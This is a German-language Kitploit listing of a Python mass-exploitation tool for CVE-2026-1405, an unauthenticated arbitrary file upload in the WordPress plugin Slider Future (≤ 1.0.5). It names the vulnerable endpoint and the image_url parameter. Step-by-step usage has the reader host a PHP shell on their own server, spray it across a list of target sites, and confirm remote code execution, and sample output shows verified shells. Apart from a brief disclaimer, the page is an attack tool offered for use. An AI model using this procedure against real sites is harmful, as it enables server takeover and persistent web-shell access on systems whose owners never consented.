Skip to content
KitploitKITPLOIT
ToolsBlog
Log in
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

FeedsKontaktDatenschutz© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-1405 — Slider Future <= 1.0.5 – Nicht authentifizierter beliebiger Datei-Upload | Kitploit
Tools/GitHubGitHub/nxploited/cve-2026-1405
Payload-GenerierungExploitationScripting & AutomatisierungWebanwendungs-ExploitationPenetrationstestsRed Teaming
GitHubnxploited/cve-2026-1405

CVE-2026-1405

Slider Future <= 1.0.5 – Nicht authentifizierter beliebiger Datei-Upload

Repository anzeigen
4110vor 7 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2026-1405

Slider Future <= 1.0.5 - Nicht authentifizierter Upload beliebiger Dateien

🚀 CVE-2026-1405.py — Slider Future Massen-Exploit-Tool

🩸 Schwachstellenübersicht

Komponente: Slider Future (WordPress-Plugin)
Betroffene Versionen: ≤ 1.0.5
Schwachstelle: Nicht authentifizierter Upload beliebiger Dateien
CVE: CVE-2026-1405
CVSS-Score: 9.8 (Kritisch)

Das Slider-Future-Plugin für WordPress ist anfällig für beliebige Datei-Uploads, da in allen Versionen bis einschließlich 1.0.5 die Dateitypprüfung in der Funktion slider_future_handle_image_upload fehlt. Dadurch können nicht authentifizierte Angreifer beliebige Dateitypen – einschließlich bösartiger PHP-Shells – direkt auf den betroffenen Server hochladen, was die Ausführung von Remote-Code ermöglicht.


⚡ Exploit-Funktionen

  • Massenausnutzung über mehrere Ziele hinweg.
  • Verwendet den verwundbaren Endpunkt: /wp-json/slider-future/v1/upload-image/
  • Lädt eine entfernte PHP-Shell über den Parameter image_url hoch (keine Authentifizierung erforderlich).
  • Überprüft automatisch die Shell-Ausführung, indem benutzerdefinierte Signaturen geprüft werden.

🛠️ Verwendung

1. Bereiten Sie eine Textdatei mit Ihren Ziel-WordPress-Seiten vor (eine pro Zeile):

http://example1.com
https://example2.com
...

2. Hosten Sie Ihre PHP-Shell online und halten Sie deren direkte URL bereit.

Beispiel: http://yourserver.com/shell.php

3. Führen Sie das Skript aus:

python3 CVE-2026-1405.py

Sie werden nach Folgendem gefragt:

  • Zieldatei: Pfad zu Ihrer Zielliste (Standard: list.txt)
  • Direkte Shell-URL: Die online erreichbare Shell, die Sie auf die Ziele hochladen möchten
  • Shell-Signatur: Eine eindeutige Zeichenfolge in Ihrer Shell zur Überprüfung (z. B. Nxploited)
  • Threads: Anzahl der parallelen Threads (Standard: 10)

4. Ausgabe

  • Exploit-Ergebnisse werden live in einer professionellen Rich-basierten Oberfläche angezeigt.
  • Erfolgreiche Ziele und Shell-URLs werden automatisch in success_results.txt gespeichert.

📝 Skript-Details

  • Name: CVE-2026-1405.py
  • Autor: Nxploited
  • Sprache: Python 3
  • Bibliotheken: requests, rich

So funktioniert es

  1. Sendet eine POST-Anfrage an den verwundbaren Endpunkt jedes Ziels:
    • URL: /wp-json/slider-future/v1/upload-image/
    • Parameter: image_url, der auf Ihre Shell verweist.
  2. Analysiert die JSON-Antwort, um die URL der hochgeladenen Shell zu extrahieren.
  3. Ruft die Shell-URL auf und sucht nach Ihrer Signaturzeichenfolge.
  4. Zeigt den Status: Erfolg oder Fehlschlag für jedes Ziel an.

⚠️ Rechtlicher Haftungsausschluss

Dieses Tool dient ausschließlich pädagogischen und autorisierten Sicherheitstests.
Die unbefugte Nutzung gegen Websites, die Sie nicht besitzen oder für die Sie keine ausdrückliche Testgenehmigung haben, ist illegal.


💡 Beispielausgabe

Exploit For: CVE-2026-1405
By: Nxploited

Targets loaded: 12
Shell URL: http://yourserver.com/shell.php
Signature: Nxploited

2026-02-20T16:05:23.123456+00:00 | http://target1.com -> SUCCESS | Shell Verified: http://target1.com/wp-content/uploads/2026/02/shell.php
2026-02-20T16:05:24.542342+00:00 | http://target2.com -> Upload failed or shell URL not found.
...
Finished: 3/12 succeeded in 14.7s
Saved successes to success_results.txt
Tool herunterladen